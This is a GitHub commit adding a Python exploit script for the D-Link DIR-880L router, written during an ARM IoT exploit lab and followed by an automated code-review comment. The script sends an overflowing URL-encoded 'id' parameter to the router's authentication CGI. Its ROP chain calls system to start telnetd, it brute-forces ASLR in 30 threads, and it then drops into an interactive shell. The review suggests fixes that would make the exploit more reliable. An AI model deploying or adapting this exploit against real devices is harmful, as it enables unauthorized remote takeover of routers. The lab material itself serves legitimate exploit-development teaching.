  • bypassing DEP & bruting ASLR

    Exploit written during the ARM exploit lab of @realsaumil
  • 3sjay committed with GitHub 2 years ago
    169de647
    1 parent 1e9640ba
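--- a/dlink880l_expl.py
+++ b/dlink880l_expl.py
@@ -0,0 +1,141 @@
+#!/usr/bin/python
+#
+# The ARM IoT Exploit Laboratory
+# by Saumil Shah
+#
+# Exploit template for DLINK DIR-880L router
+ 
+from telnetlib import Telnet
+from time import sleep
+import struct, sys, re, socket, threading
+ 
+##### HELPER FUNCTIONS #####
+ 
+def pack32(value):
+ return struct.pack("<I", value) # little byte order
+ 
+def pack16n(value):
+ return struct.pack(">H", value) # big/network byte order
+ 
+def urlencode(buf):
+ s = ""
+ for b in buf:
+ if re.match(r"[a-zA-Z0-9\/]", b) is None:
+ s += "%%%02X" % ord(b)
+ else:
+ s += b
+ return s
+ 
+##### HELPER FUNCTIONS FOR ROP CHAINING #####
+ 
+# function to create a libc gadget
+# requires a global variable called libc_base
+def libc(offset):
+ return pack32(libc_base + offset)
+ 
+# function to represent data on the stack
+def data(data):
+ return pack32(data)
+ 
+# function to check for bad characters
+# run this before sending out the payload
+# e.g. detect_badchars(payload, "\x00\x0a\x0d/?")
+def detect_badchars(string, badchars):
+ for badchar in badchars:
+ i = string.find(badchar)
+ while i != -1:
+ sys.stderr.write("[!] 0x%02x appears at position %d\n" % (ord(badchar), i))
+ i = string.find(badchar, i+1)
+ 
+##### MAIN #####
+ 
+def check(ip):
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ try:
+ s.connect((ip, 23))
+ return True
+ except:
+ return False
+ 
+def brute(ip, port):
+ global expl_successful
+ 
+ while expl_successful == False:
+ 
+ buf = "A" * 408
+ 
+ #libc_base = 0x4000e000
+ #libc_base = 0x400d7000
+ libc_base = 0x400e7000
+ 
+ bx_sp = pack32(libc_base + 0x61d5)
+ pop_r3_pc = pack32(libc_base + 0x00018298)
+ mov_r0_sp_blx_r3 = pack32(libc_base + 0x00040cb8)
+ system = pack32(libc_base + 0x5a270)
+ 
+ 
+ # building the actual rop chain
+ # Good ressource: https://fidusinfosec.com/remote-code-execution-cve-2018-5767/
+ chain = pop_r3_pc
+ chain += system
+ chain += mov_r0_sp_blx_r3
+ chain += "/usr/sbin/telnetd"
+ chain += ";abc"
+ 
+ 
+ #buf += pack32(0x42424242)
+ buf += chain
+ 
+ 
+ buf += "C"*(80-len(chain))
+ 
+ detect_badchars(buf, "\x00")
+ 
+ id_param = urlencode(buf)
+ uri = "/webfa_authentication.cgi?id=%s&password=x" % id_param
+ 
+ request = "GET %s HTTP/1.0\n\n" % uri
+ #print request,
+ 
+ try:
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.connect((ip, int(port)))
+ s.send(request)
+ except:
+ pass
+ 
+ 
+ 
+def main():
+ if len(sys.argv) != 3:
+ print("Usage: {} <ip> <port>".format(sys.argv[0]))
+ sys.exit(1)
+ 
+ ip = sys.argv[1]
+ port = sys.argv[2]
+ 
+ 
+ global expl_successful
+ expl_successful = False
+ 
+ print("[+] Running exploit against {}:{}".format(ip, port))
+ print("[*] Wait a bit, we're bruting ASLR...")
+ 
+ threads = []
+ for i in range(0, 30):
+ t = threading.Thread(target=brute, args=(ip, port))
+ t.start()
+ threads.append(t)
+ 
+ 
+ while expl_successful == False:
+ expl_successful = check(ip)
+ 
+ print("[+] Exploit successful! Enjoy your shell.")
+
+ tn = Telnet(ip)
+ tn.interact()
+ 
+ 
+main()
+ 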
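Review bot: `check()` (hunk lines 52-58) opens a socket with no timeout, never closes it, and its bare `except:` also catches `KeyboardInterrupt` and `SystemExit`, so the polling loop in `main()` leaks one descriptor per iteration and cannot be interrupted cleanly; `brute()` (lines 100-105) wraps an unclosed socket in the same bare `except:`. The body of `check()` reduces to `with socket.create_connection((ip, 23), timeout=2.0): return True` under the `try:`, followed by `except OSError: return False`, which closes the socket on every path and lets signals propagate. Separately, `libc()` (lines 33-34) reads a module-level `libc_base` that is never defined — `brute()` only binds a local of that name — so any call to it raises `NameError`; either define it at module scope as the comment on line 32 promises, or remove the unused helper. The `threads` list built on lines 124-128 is also never joined, which is worth a comment if that is intentional.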